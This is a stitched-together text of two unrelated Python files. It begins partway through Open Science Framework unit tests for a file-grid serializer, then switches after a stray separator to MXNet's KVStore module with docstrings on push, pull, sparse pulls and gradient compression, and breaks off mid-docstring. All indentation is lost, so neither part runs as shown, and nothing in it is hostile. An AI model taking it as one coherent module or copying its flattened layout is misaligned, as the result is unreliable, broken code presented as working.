def test_serialized_pointer_has_flag_indicating_its_a_pointer(self):
pointer = PointerFactory()
serializer = rubeus.NodeFileCollector(node=pointer, auth=self.consolidated_auth)
ret = serializer._serialize_node(pointer)
assert_true(ret['isPointer'])
# TODO: Make this more reusable across test modules
mock_addon = mock.Mock()
serialized = {
'addon': 'mockaddon',
'name': 'Mock Addon',
'isAddonRoot': True,
'extra': '',
'permissions': {'view': True, 'edit': True},
'urls': {
'fetch': '/fetch',
'delete': '/delete'
}
}
mock_addon.config.get_hgrid_data.return_value = [serialized]
class TestSerializingNodeWithAddon(OsfTestCase):
def setUp(self):
super(TestSerializingNodeWithAddon, self).setUp()
self.auth = AuthFactory()
self.project = ProjectFactory(creator=self.auth.user)
self.project.get_addons = mock.Mock()
self.project.get_addons.return_value = [mock_addon]
self.serializer = rubeus.NodeFileCollector(node=self.project, auth=self.auth)
def test_collect_addons(self):
ret = self.serializer._collect_addons(self.project)
assert_equal(ret, [serialized])
def test_sort_by_name(self):
files = [
{'name': 'F.png'},
{'name': 'd.png'},
{'name': 'B.png'},
{'name': 'a.png'},
{'name': 'c.png'},
{'name': 'e.png'},
{'name': 'g.png'},
]
sorted_files = [
{'name': 'a.png'},
{'name': 'B.png'},
{'name': 'c.png'},
{'name': 'd.png'},
{'name': 'e.png'},
{'name': 'F.png'},
{'name': 'g.png'},
]
ret = sort_by_name(files)
for index, value in enumerate(ret):
assert_equal(value['name'], sorted_files[index]['name'])
def test_sort_by_name_none(self):
files = None
sorted_files = None
ret = sort_by_name(files)
assert_equal(ret, sorted_files)
def test_serialize_node(self):
ret = self.serializer._serialize_node(self.project)
assert_equal(
len(ret['children']),
len(self.project.get_addons.return_value) + len(self.project.nodes)
)
assert_equal(ret['kind'], rubeus.FOLDER)
assert_equal(ret['name'], 'Project: {0}'.format(self.project.title))
assert_equal(
ret['permissions'],
{
'view': True,
'edit': True,
}
)
assert_equal(
ret['urls'],
{
'upload': None,
'fetch': None,
},
)
def test_collect_js_recursive(self):
self.project.get_addons.return_value[0].config.include_js = {'files': ['foo.js']}
self.project.get_addons.return_value[0].config.short_name = 'dropbox'
node = NodeFactory(parent=self.project)
mock_node_addon = mock.Mock()
mock_node_addon.config.include_js = {'files': ['bar.js', 'baz.js']}
mock_node_addon.config.short_name = 'dropbox'
node.get_addons = mock.Mock()
node.get_addons.return_value = [mock_node_addon]
result = rubeus.collect_addon_js(self.project)
assert_in('foo.js', result)
assert_in('bar.js', result)
assert_in('baz.js', result)
def test_collect_js_unique(self):
self.project.get_addons.return_value[0].config.include_js = {'files': ['foo.js']}
self.project.get_addons.return_value[0].config.short_name = 'dropbox'
node = NodeFactory(parent=self.project)
mock_node_addon = mock.Mock()
mock_node_addon.config.include_js = {'files': ['foo.js', 'baz.js']}
mock_node_addon.config.short_name = 'dropbox'
node.get_addons = mock.Mock()
node.get_addons.return_value = [mock_node_addon]
result = rubeus.collect_addon_js(self.project)
assert_in('foo.js', result)
assert_in('baz.js', result)
class TestSerializingEmptyDashboard(OsfTestCase):
def setUp(self):
super(TestSerializingEmptyDashboard, self).setUp()
self.dash = DashboardFactory()
self.auth = AuthFactory(user=self.dash.creator)
self.dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
def test_empty_dashboard_hgrid_representation_is_list(self):
assert_is_instance(self.dash_hgrid, list)
def test_empty_dashboard_has_proper_number_of_smart_folders(self):
assert_equal(len(self.dash_hgrid), 2)
def test_empty_dashboard_smart_folders_have_correct_names_and_ids(self):
for node_hgrid in self.dash_hgrid:
assert_in(node_hgrid['name'], (ALL_MY_PROJECTS_NAME, ALL_MY_REGISTRATIONS_NAME))
for node_hgrid in self.dash_hgrid:
if node_hgrid['name'] == ALL_MY_PROJECTS_NAME:
assert_equal(node_hgrid['node_id'], ALL_MY_PROJECTS_ID)
elif node_hgrid['name'] == ALL_MY_REGISTRATIONS_NAME:
assert_equal(node_hgrid['node_id'], ALL_MY_REGISTRATIONS_ID)
def test_empty_dashboard_smart_folders_are_empty(self):
for node_hgrid in self.dash_hgrid:
assert_equal(node_hgrid['children'], [])
def test_empty_dashboard_are_valid_folders(self):
for node in self.dash_hgrid:
assert_valid_hgrid_folder(node)
def test_empty_dashboard_smart_folders_are_valid_smart_folders(self):
for node in self.dash_hgrid:
assert_valid_hgrid_smart_folder(node)
class TestSerializingPopulatedDashboard(OsfTestCase):
def setUp(self):
super(TestSerializingPopulatedDashboard, self).setUp()
self.dash = DashboardFactory()
self.user = self.dash.creator
self.auth = AuthFactory(user=self.user)
self.init_dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
def test_dashboard_adding_one_folder_increases_size_by_one(self):
folder = FolderFactory(creator=self.user)
self.dash.add_pointer(folder, self.auth)
dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
assert_equal(len(dash_hgrid), len(self.init_dash_hgrid) + 1)
def test_dashboard_adding_one_folder_does_not_remove_smart_folders(self):
folder = FolderFactory(creator=self.user)
self.dash.add_pointer(folder, self.auth)
dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
assert_true(
{ALL_MY_PROJECTS_NAME, ALL_MY_REGISTRATIONS_NAME, folder.title} <=
{node_hgrid['name'] for node_hgrid in dash_hgrid}
)
def test_dashboard_adding_one_folder_increases_size_by_one_in_hgrid_representation(self):
folder = FolderFactory(creator=self.user)
self.dash.add_pointer(folder, self.auth)
project = ProjectFactory(creator=self.user)
folder.add_pointer(project,self.auth)
dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
assert_equal(len(dash_hgrid), len(self.init_dash_hgrid) + 1)
class TestSerializingFolders(OsfTestCase):
def setUp(self):
super(TestSerializingFolders, self).setUp()
self.user = UserFactory()
self.auth = AuthFactory(user=self.user)
def test_serialized_folder_is_valid_folder(self):
folder = FolderFactory(creator=self.user)
folder_hgrid = rubeus.to_project_hgrid(folder, self.auth)
assert_equal(folder_hgrid, [])
def test_serialize_folder_containing_folder_increases_size_by_one(self):
outer_folder = FolderFactory(creator=self.user)
folder_hgrid = rubeus.to_project_hgrid(outer_folder, self.auth)
inner_folder = FolderFactory(creator=self.user)
outer_folder.add_pointer(inner_folder, self.auth)
new_hgrid = rubeus.to_project_hgrid(outer_folder, self.auth)
assert_equal(len(folder_hgrid) + 1, len(new_hgrid))
class TestSmartFolderViews(OsfTestCase):
def setUp(self):
super(TestSmartFolderViews, self).setUp()
self.dash = DashboardFactory()
self.user = self.dash.creator
self.auth = AuthFactory(user=self.user)
@mock.patch('website.project.decorators.Auth.from_kwargs')
def test_adding_project_to_dashboard_increases_json_size_by_one(self, mock_from_kwargs):
mock_from_kwargs.return_value = Auth(user=self.user)
url = api_url_for('get_dashboard')
res = self.app.get(url + ALL_MY_PROJECTS_ID)
init_len = len(res.json[u'data'])
ProjectFactory(creator=self.user)
res = self.app.get(url + ALL_MY_PROJECTS_ID)
assert_equal(len(res.json[u'data']), init_len + 1)
@mock.patch('website.project.decorators.Auth.from_kwargs')
def test_adding_registration_to_dashboard_increases_json_size_by_one(self, mock_from_kwargs):
mock_from_kwargs.return_value = Auth(user=self.user)
url = api_url_for('get_dashboard')
res = self.app.get(url + ALL_MY_REGISTRATIONS_ID)
init_len = len(res.json[u'data'])
RegistrationFactory(creator=self.user)
res = self.app.get(url + ALL_MY_REGISTRATIONS_ID)
assert_equal(len(res.json[u'data']), init_len + 1)
def assert_valid_hgrid_folder(node_hgrid):
folder_types = {
'name': str,
'children': list,
'contributors': list,
'dateModified': (DateTime, NoneType),
'node_id': str,
'modifiedDelta': int,
'modifiedBy': (dict, NoneType),
'urls': dict,
'isDashboard': bool,
'expand': bool,
'permissions': dict,
'isSmartFolder': bool,
'childrenCount': int,
}
keys_types = {
'urls': (str, NoneType),
'permissions': bool,
}
folder_values = {
'parentIsFolder': True,
'isPointer': False,
'isFolder': True,
'kind': 'folder',
'type': 'smart-folder'
}
if isinstance(node_hgrid, list):
node_hgrid = node_hgrid[0]['data']
else:
assert_is_instance(node_hgrid, dict)
for key, correct_value in folder_values.items():
assert_equal(node_hgrid[key], correct_value)
for key, correct_type in folder_types.items():
assert_is_instance(node_hgrid[key], correct_type)
for key, correct_type in keys_types.items():
for inner_key, inner_value in node_hgrid[key].items():
assert_is_instance(inner_value, correct_type)
valid_keys = set(folder_types.keys()).union(folder_values.keys())
for key in node_hgrid.keys():
assert_in(key, valid_keys)
def assert_valid_hgrid_smart_folder(node_hgrid):
smart_folder_values = {
'contributors': [],
'isPointer': False,
'dateModified': None,
'modifiedDelta': 0,
'modifiedBy': None,
'isSmartFolder': True,
'urls': {
'upload': None,
'fetch': None
},
'isDashboard': False,
'permissions': {
'edit': False,
'acceptsDrops': False,
'copyable': False,
'movable': False,
'view': True
}
}
assert_valid_hgrid_folder(node_hgrid)
for attr, correct_value in smart_folder_values.items():
assert_equal(correct_value, node_hgrid[attr])
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
""" Key value store interface of MXNet for parameter synchronization."""
import pickle
import ctypes
import os
from ..ndarray import NDArray
from ..ndarray import _ndarray_cls
from ..base import _LIB, c_str
from ..base import check_call, mx_uint, py_str
from ..base import NDArrayHandle, KVStoreHandle
from .. import optimizer as opt
from .base import _ctype_key_value, _ctype_dict, KVStoreBase
__all__ = ['KVStore']
def _updater_wrapper(updater):
"""A wrapper for the user-defined handle."""
def updater_handle(key, lhs_handle, rhs_handle, _):
""" ctypes function """
lhs = _ndarray_cls(NDArrayHandle(lhs_handle))
rhs = _ndarray_cls(NDArrayHandle(rhs_handle))
updater(key, lhs, rhs)
return updater_handle
def _get_kvstore_server_command_type(command):
command_types = {'kController': 0,
'kSetMultiPrecision': 1,
'kStopServer': 2,
'kSyncMode': 3,
'kSetGradientCompression': 4,
'kSetProfilerParams': 5}
assert (command in command_types), "Unknown command type to send to server"
return command_types[command]
class KVStore(KVStoreBase):
"""A key-value store for synchronization of values, over multiple devices."""
def __init__(self, handle):
"""Initializes a new KVStore.
Parameters
----------
handle : KVStoreHandle
`KVStore` handle of C API.
"""
assert isinstance(handle, KVStoreHandle)
self.handle = handle
self._updater = None
self._updater_func = None
self._str_updater_func = None
self._is_p3 = (os.getenv('DMLC_PS_VAN_TYPE', '') == 'p3')
def __del__(self):
check_call(_LIB.MXKVStoreFree(self.handle))
def broadcast(self, key, value, out, priority=0):
""" Broadcast the `value` NDArray at rank 0 to all ranks,
and store the result in `out`.
Note that the native KVStore does not support broadcasting the same key more than once.
Parameters
----------
key : str, or int
The key.
value : NDArray, list of NDArray, or list of list of NDArray
Values corresponding to the keys.
out: NDArray or list of NDArray or list of list of NDArray
Outputs corresponding to the keys.
priority : int, optional
The priority of the operation.
Higher priority operations are likely to be executed before other actions.
Examples
--------
>>> # broadcast a single key-value pair
>>> shape = (2,3)
>>> kv = mx.kv.create('local')
>>> a = mx.nd.zeros(shape)
>>> kv.broadcast('3', mx.nd.ones(shape)*2, out=a)
>>> print a.asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
"""
cvkeys, cvals, use_str_keys = _ctype_key_value(key, value)
cokeys, couts, _ = _ctype_key_value(key, out)
if use_str_keys:
check_call(_LIB.MXKVStoreBroadcastEx(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStoreBroadcast(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
def is_capable(self, capability):
"""Queries if the KVStore type supports certain capability, such as optimizer algorithm,
gradient compression, sparsity, etc.
Parameters
----------
capability: str
The capability to query
Returns
-------
result : bool
Whether the capability is supported or not.
"""
if capability.lower() == KVStoreBase.OPTIMIZER:
return not self._is_p3
else:
raise ValueError('Unknown capability: {}'.format(capability))
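# A minimal sketch (hedged; assumes a kvstore handle "kv" created elsewhere and
# a hypothetical local fallback):
#
#   if kv.is_capable(KVStoreBase.OPTIMIZER):
#       kv.set_optimizer(opt.SGD())    # server-side updates are supported
#   else:
#       update_parameters_locally()    # hypothetical fallback path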
def init(self, key, value):
""" Initializes a single or a sequence of key-value pairs into the store.
For each key, one must `init` it before calling `push` or `pull`.
When multiple workers invoke `init` for the same key, only
the value supplied by worker with rank `0` is used. This function returns
after data has been initialized successfully.
Parameters
----------
key : str, int, or sequence of str or int
The keys.
value : NDArray, RowSparseNDArray or sequence of NDArray or RowSparseNDArray
Values corresponding to the keys.
Examples
--------
>>> # init a single key-value pair
>>> shape = (2,3)
>>> kv = mx.kv.create('local')
>>> kv.init('3', mx.nd.ones(shape)*2)
>>> a = mx.nd.zeros(shape)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # init a list of key-value pairs
>>> keys = ['5', '7', '9']
>>> kv.init(keys, [mx.nd.ones(shape)]*len(keys))
>>> # init a row_sparse value
>>> kv.init('4', mx.nd.ones(shape).tostype('row_sparse'))
>>> b = mx.nd.sparse.zeros('row_sparse', shape)
>>> kv.row_sparse_pull('4', row_ids=mx.nd.array([0, 1]), out=b)
>>> print b
<RowSparseNDArray 2x3 @cpu(0)>
"""
ckeys, cvals, use_str_keys = _ctype_key_value(key, value)
if use_str_keys:
check_call(_LIB.MXKVStoreInitEx(self.handle, mx_uint(len(ckeys)), ckeys, cvals))
else:
check_call(_LIB.MXKVStoreInit(self.handle, mx_uint(len(ckeys)), ckeys, cvals))
def push(self, key, value, priority=0):
""" Pushes a single or a sequence of key-value pairs into the store.
This function returns immediately after adding an operator to the engine.
The actual operation is executed asynchronously. If there are consecutive
pushes to the same key, there is no guarantee on the serialization of pushes.
The execution of a push does not guarantee that all previous pushes are
finished.
There is no synchronization between workers.
One can use ``_barrier()`` to sync all workers.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
value : NDArray, RowSparseNDArray, list of NDArray or RowSparseNDArray,
or list of list of NDArray or RowSparseNDArray
Values corresponding to the keys.
priority : int, optional
The priority of the push operation.
Higher priority push operations are likely to be executed before
other push actions.
Examples
--------
>>> # push a single key-value pair
>>> shape = (2,3)
>>> kv.push('3', mx.nd.ones(shape)*8)
>>> kv.pull('3', out=a) # pull out the value
>>> print a.asnumpy()
[[ 8. 8. 8.]
[ 8. 8. 8.]]
>>> # aggregate the value and the push
>>> gpus = [mx.gpu(i) for i in range(4)]
>>> b = [mx.nd.ones(shape, gpu) for gpu in gpus]
>>> kv.push('3', b)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> # push a list of keys.
>>> # single device
>>> keys = ['4', '5', '6']
>>> kv.push(keys, [mx.nd.ones(shape)]*len(keys))
>>> b = [mx.nd.zeros(shape)]*len(keys)
>>> kv.pull(keys, out=b)
>>> print b[1].asnumpy()
[[ 1. 1. 1.]
[ 1. 1. 1.]]
>>> # multiple devices:
>>> keys = ['7', '8', '9']
>>> b = [[mx.nd.ones(shape, gpu) for gpu in gpus]] * len(keys)
>>> kv.push(keys, b)
>>> kv.pull(keys, out=b)
>>> print b[1][1].asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> # push a row_sparse value
>>> b = mx.nd.sparse.zeros('row_sparse', shape)
>>> kv.init('10', mx.nd.sparse.zeros('row_sparse', shape))
>>> kv.push('10', mx.nd.ones(shape).tostype('row_sparse'))
>>> # pull out the value
>>> kv.row_sparse_pull('10', row_ids=mx.nd.array([0, 1]), out=b)
>>> print b
<RowSparseNDArray 2x3 @cpu(0)>
"""
ckeys, cvals, use_str_keys = _ctype_key_value(key, value)
if use_str_keys:
check_call(_LIB.MXKVStorePushEx(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStorePush(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, ctypes.c_int(priority)))
def pull(self, key, out=None, priority=0, ignore_sparse=True):
""" Pulls a single value or a sequence of values from the store.
This function returns immediately after adding an operator to the engine.
Subsequent attempts to read from the `out` variable will be blocked until the
pull operation completes.
`pull` is executed asynchronously after all previous `pull` calls and only
the last `push` call for the same input key(s) are finished.
The returned values are guaranteed to be the latest values in the store.
pull with `RowSparseNDArray` is not supported for dist kvstore.
Please use ``row_sparse_pull`` instead.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
out: NDArray or list of NDArray or list of list of NDArray
Values corresponding to the keys.
priority : int, optional
The priority of the pull operation.
Higher priority pull operations are likely to be executed before
other pull actions.
ignore_sparse: bool, optional, default True
Whether to ignore sparse arrays in the request.
Examples
--------
>>> # pull a single key-value pair
>>> shape = (2,3)
>>> a = mx.nd.zeros(shape)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # pull into multiple devices
>>> b = [mx.nd.ones(shape, gpu) for gpu in gpus]
>>> kv.pull('3', out=b)
>>> print b[1].asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # pull a list of key-value pairs.
>>> # On single device
>>> keys = ['5', '7', '9']
>>> b = [mx.nd.zeros(shape)]*len(keys)
>>> kv.pull(keys, out=b)
>>> print b[1].asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # On multiple devices
>>> keys = ['6', '8', '10']
>>> b = [[mx.nd.ones(shape, gpu) for gpu in gpus]] * len(keys)
>>> kv.pull(keys, out=b)
>>> print b[1][1].asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
"""
assert(out is not None)
ckeys, cvals, use_str_keys = _ctype_key_value(key, out)
if use_str_keys:
check_call(_LIB.MXKVStorePullWithSparseEx(self.handle, mx_uint(len(ckeys)), ckeys,
cvals, ctypes.c_int(priority),
ctypes.c_bool(ignore_sparse)))
else:
check_call(_LIB.MXKVStorePullWithSparse(self.handle, mx_uint(len(ckeys)), ckeys,
cvals, ctypes.c_int(priority),
ctypes.c_bool(ignore_sparse)))
def pushpull(self, key, value, out=None, priority=0):
""" Performs push and pull a single value or a sequence of values from the store.
This function is coalesced form of push and pull operations. This function returns
immediately after adding an operator to the engine. Subsequent attempts to read
from the `out` variable will be blocked until the pull operation completes.
`value` is pushed to the kvstore server for the specified keys and the updated
values are pulled from the server to `out`. If `out` is not specified the pulled
values are written to `value`. The returned values are guaranteed to be the latest
values in the store.
pushpull with `RowSparseNDArray` is not supported for dist kvstore.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
value : NDArray, list of NDArray, or list of list of NDArray
Values corresponding to the keys.
out: NDArray or list of NDArray or list of list of NDArray, optional
Outputs corresponding to the keys.
priority : int, optional
The priority of the operation.
Higher priority operations are likely to be executed before other actions.
Examples
--------
>>> # pushpull a single key-value pair
>>> shape = (2,3)
>>> kv.pushpull('3', mx.nd.ones(shape)*8, out=a)
>>> print a.asnumpy()
[[ 8. 8. 8.]
[ 8. 8. 8.]]
>>> # aggregate the value and then pushpull
>>> gpus = [mx.gpu(i) for i in range(4)]
>>> b = [mx.nd.ones(shape, gpu) for gpu in gpus]
>>> kv.pushpull('3', b, out=a)
>>> print a.asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> # pushpull a list of keys.
>>> # single device
>>> keys = ['4', '5', '6']
>>> b = [mx.nd.zeros(shape)]*len(keys)
>>> kv.pushpull(keys, [mx.nd.ones(shape)]*len(keys), out=b)
>>> print b[1].asnumpy()
[[ 1. 1. 1.]
[ 1. 1. 1.]]
>>> # multiple devices:
>>> keys = ['7', '8', '9']
>>> b = [[mx.nd.ones(shape, gpu) for gpu in gpus]] * len(keys)
>>> kv.pushpull(keys, b)
>>> print b[1][1].asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
"""
cvkeys, cvals, use_str_keys = _ctype_key_value(key, value)
if out is not None:
cokeys, couts, _ = _ctype_key_value(key, out)
else:
cokeys = cvkeys
couts = cvals
if use_str_keys:
check_call(_LIB.MXKVStorePushPullEx(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStorePushPull(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
def row_sparse_pull(self, key, out=None, priority=0, row_ids=None):
""" Pulls a single RowSparseNDArray value or a sequence of RowSparseNDArray values \
from the store with specified row_ids. When there is only one row_id, KVStoreRowSparsePull \
is invoked just once and the result is broadcast to all the rest of outputs.
`row_sparse_pull` is executed asynchronously after all previous
`pull`/`row_sparse_pull` calls and the last `push` call for the
same input key(s) are finished.
The returned values are guaranteed to be the latest values in the store.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
out: RowSparseNDArray or list of RowSparseNDArray or list of list of RowSparseNDArray
Values corresponding to the keys. The stype is expected to be row_sparse
priority : int, optional
The priority of the pull operation.
Higher priority pull operations are likely to be executed before
other pull actions.
row_ids : NDArray or list of NDArray
The row_ids for which to pull for each value. Each row_id is a 1-D NDArray \
whose values don't have to be unique nor sorted.
Examples
--------
>>> shape = (3, 3)
>>> kv.init('3', mx.nd.ones(shape).tostype('row_sparse'))
>>> a = mx.nd.sparse.zeros('row_sparse', shape)
>>> row_ids = mx.nd.array([0, 2], dtype='int64')
>>> kv.row_sparse_pull('3', out=a, row_ids=row_ids)
>>> print a.asnumpy()
[[ 1. 1. 1.]
[ 0. 0. 0.]
[ 1. 1. 1.]]
>>> duplicate_row_ids = mx.nd.array([2, 2], dtype='int64')
>>> kv.row_sparse_pull('3', out=a, row_ids=duplicate_row_ids)
>>> print a.asnumpy()
[[ 0. 0. 0.]
[ 0. 0. 0.]
[ 1. 1. 1.]]
>>> unsorted_row_ids = mx.nd.array([1, 0], dtype='int64')
>>> kv.row_sparse_pull('3', out=a, row_ids=unsorted_row_ids)
>>> print a.asnumpy()
[[ 1. 1. 1.]
[ 1. 1. 1.]
[ 0. 0. 0.]]
"""
assert(out is not None)
assert(row_ids is not None)
if isinstance(row_ids, NDArray):
row_ids = [row_ids]
assert(isinstance(row_ids, list)), \
"row_ids should be NDArray or list of NDArray"
first_out = out
# whether row_ids are the same
single_rowid = False
if len(row_ids) == 1 and isinstance(out, list):
single_rowid = True
first_out = [out[0]]
ckeys, cvals, use_str_keys = _ctype_key_value(key, first_out)
_, crow_ids, _ = _ctype_key_value(key, row_ids)
assert(len(crow_ids) == len(cvals)), \
"the number of row_ids doesn't match the number of values"
if use_str_keys:
check_call(_LIB.MXKVStorePullRowSparseEx(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, crow_ids, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStorePullRowSparse(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, crow_ids, ctypes.c_int(priority)))
# the result can be copied to other devices without invoking row_sparse_pull
# if the indices are the same
if single_rowid:
for out_i in out[1:]:
out[0].copyto(out_i)
def set_gradient_compression(self, compression_params):
""" Specifies type of low-bit quantization for gradient compression \
and additional arguments depending on the type of compression being used.
The 1bit compression works as follows: values which are above the threshold in the
gradient will be set to +1, whereas values below the threshold will be set to -1.
2bit Gradient Compression takes a positive float `threshold`.
The technique works by thresholding values such that positive values in the
gradient above threshold will be set to threshold. Negative values whose absolute
values are higher than threshold, will be set to the negative of threshold.
Values whose absolute values are less than threshold will be set to 0.
By doing so, each value in the gradient is in one of three states. 2bits are
used to represent these states, and every 16 float values in the original
gradient can be represented using one float. This compressed representation
can reduce communication costs. The difference between these thresholded values and
original values is stored at the sender's end as residual and added to the
gradient in the next iteration.
When kvstore is 'local', gradient compression is used to reduce communication
between multiple devices (gpus). Gradient is quantized on each GPU which
computed the gradients, then sent to the GPU which merges the gradients. This
receiving GPU dequantizes the gradients and merges them. Note that this
increases memory usage on each GPU because of the residual array stored.
When kvstore is 'dist', gradient compression is used to reduce communication
from worker to sender. Gradient is quantized on each worker which
computed the gradients, then sent to the server which dequantizes
this data and merges the gradients from each worker. Note that this
increases CPU memory usage on each worker because of the residual array stored.
Only worker to server communication is compressed in this setting.
If each machine has multiple GPUs, currently this GPU to GPU or GPU to CPU communication
is not compressed. Server to worker communication (in the case of pull)
is also not compressed.
To use 2bit compression, we need to specify `type` as `2bit`.
Only specifying `type` would use default value for the threshold.
To completely specify the arguments for 2bit compression, we would need to pass
a dictionary which includes `threshold` like:
{'type': '2bit', 'threshold': 0.5}
Parameters
----------
compression_params : dict
A dictionary specifying the type and parameters for gradient compression.
The key `type` in this dictionary is a
required string argument and specifies the type of gradient compression.
Currently `type` can only be `1bit` or `2bit`
Other keys in this dictionary are optional and specific to the type
of gradient compression.
"""
if ('device' in self.type) or ('dist' in self.type): # pylint: disable=unsupported-membership-test
ckeys, cvals = _ctype_dict(compression_params)
check_call(_LIB.MXKVStoreSetGradientCompression(self.handle,
mx_uint(len(compression_params)),
ckeys, cvals))
else:
raise Exception('Gradient compression is not supported for this type of kvstore')
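# A minimal usage sketch (hedged; assumes a 'dist_sync' kvstore named "kv"):
#
#   kv.set_gradient_compression({'type': '2bit', 'threshold': 0.5})
#
# Only 'device' and 'dist' kvstores accept this call, as checked above.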
def set_optimizer(self, optimizer):
""" Registers an optimizer with the kvstore.
When using a single machine, this function updates the local optimizer.
If using multiple machines and this operation is invoked from a worker node,
it will serialize the optimizer with pickle and send it to all servers.
The function returns after all servers have been updated.
Parameters
----------
optimizer : Optimizer
The new optimizer for the store
Examples
--------
>>> kv = mx.kv.create()
>>> shape = (2, 2)
>>> weight = mx.nd.zeros(shape)
>>> kv.init(3, weight)
>>> # set the optimizer for kvstore as the default SGD optimizer
>>> kv.set_optimizer(mx.optimizer.SGD())
>>> grad = mx.nd.ones(shape)
>>> kv.push(3, grad)
>>> kv.pull(3, out = weight)
>>> # weight is updated via gradient descent
>>> weight.asnumpy()
array([[-0.01, -0.01],
[-0.01, -0.01]], dtype=float32)
"""
is_worker = ctypes.c_int()
check_call(_LIB.MXKVStoreIsWorkerNode(ctypes.byref(is_worker)))
# pylint: disable=invalid-name
if 'dist' in self.type and is_worker.value: # pylint: disable=unsupported-membership-test
# send the optimizer to server
try:
# use ASCII protocol 0, might be slower, but not a big deal
optim_str = py_str(pickle.dumps(optimizer, 0))
except:
raise
cmd = _get_kvstore_server_command_type('kController')
self._send_command_to_servers(cmd, optim_str)
if optimizer.multi_precision:
cmd = _get_kvstore_server_command_type('kSetMultiPrecision')
self._send_command_to_servers(cmd, '')
else:
self._set_updater(opt.get_updater(optimizer))
@property
def type(self):
""" Returns the type of this kvstore.
Returns
-------
type : str
the string type
"""
kv_type = ctypes.c_char_p()
check_call(_LIB.MXKVStoreGetType(self.handle, ctypes.byref(kv_type)))
return py_str(kv_type.value)
@property
def rank(self):
""" Returns the rank of this worker node.
Returns
-------
rank : int
The rank of this node, which is in range [0, num_workers())
"""
rank = ctypes.c_int()
check_call(_LIB.MXKVStoreGetRank(self.handle, ctypes.byref(rank)))
return rank.value
@property
def num_workers(self):
"""Returns the number of worker nodes.
Returns
-------
size :int
The number of worker nodes.
"""
size = ctypes.c_int()
check_call(_LIB.MXKVStoreGetGroupSize(self.handle, ctypes.byref(size)))
return size.value
def save_optimizer_states(self, fname, dump_optimizer=False):
"""Saves the optimizer (updater) state to a file. This is often used when checkpointing
the model during training.
Parameters
----------
fname : str
Path to the output states file.
dump_optimizer : bool, default False
Whether to also save the optimizer itself. This would also save optimizer
information such as learning rate and weight decay schedules.
"""
assert self._updater is not None, "Cannot save states for distributed training"
with open(fname, 'wb') as fout:
fout.write(self._updater.get_states(dump_optimizer))
def load_optimizer_states(self, fname):
"""Loads the optimizer (updater) state from the file.
Parameters
----------
fname : str
Path to input states file.
"""
assert self._updater is not None, "Cannot load states for distributed training"
self._updater.set_states(open(fname, 'rb').read())
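# A minimal checkpointing sketch (hypothetical file name; only valid once a
# local updater has been set, i.e. not for 'dist' kvstores):
#
#   kv.save_optimizer_states('model-0010.states')   # at a checkpoint
#   kv.load_optimizer_states('model-0010.states')   # when resuming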
def _set_updater(self, updater):
"""Sets a push updater into the store.
This function only changes the local store. When running on multiple machines one must
use `set_optimizer`.
Parameters
----------
updater : function
The updater function.
Examples
--------
>>> def update(key, input, stored):
... print "update on key: %d" % key
... stored += input * 2
>>> kv._set_updater(update)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> kv.push('3', mx.nd.ones(shape))
update on key: 3
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 6. 6. 6.]
[ 6. 6. 6.]]
"""
self._updater = updater
# set updater with int keys
_updater_proto = ctypes.CFUNCTYPE(
None, ctypes.c_int, NDArrayHandle, NDArrayHandle, ctypes.c_void_p)
self._updater_func = _updater_proto(_updater_wrapper(updater))
# set updater with str keys
_str_updater_proto = ctypes.CFUNCTYPE(
None, ctypes.c_char_p, NDArrayHandle, NDArrayHandle, ctypes.c_void_p)
self._str_updater_func = _str_updater_proto(_updater_wrapper(updater))
check_call(_LIB.MXKVStoreSetUpdaterEx(self.handle, self._updater_func,
self._str_updater_func, None))
def _barrier(self):
"""Invokes global barrier among all worker nodes.
For example, assume there are `n` machines. We would like machine `0` to first
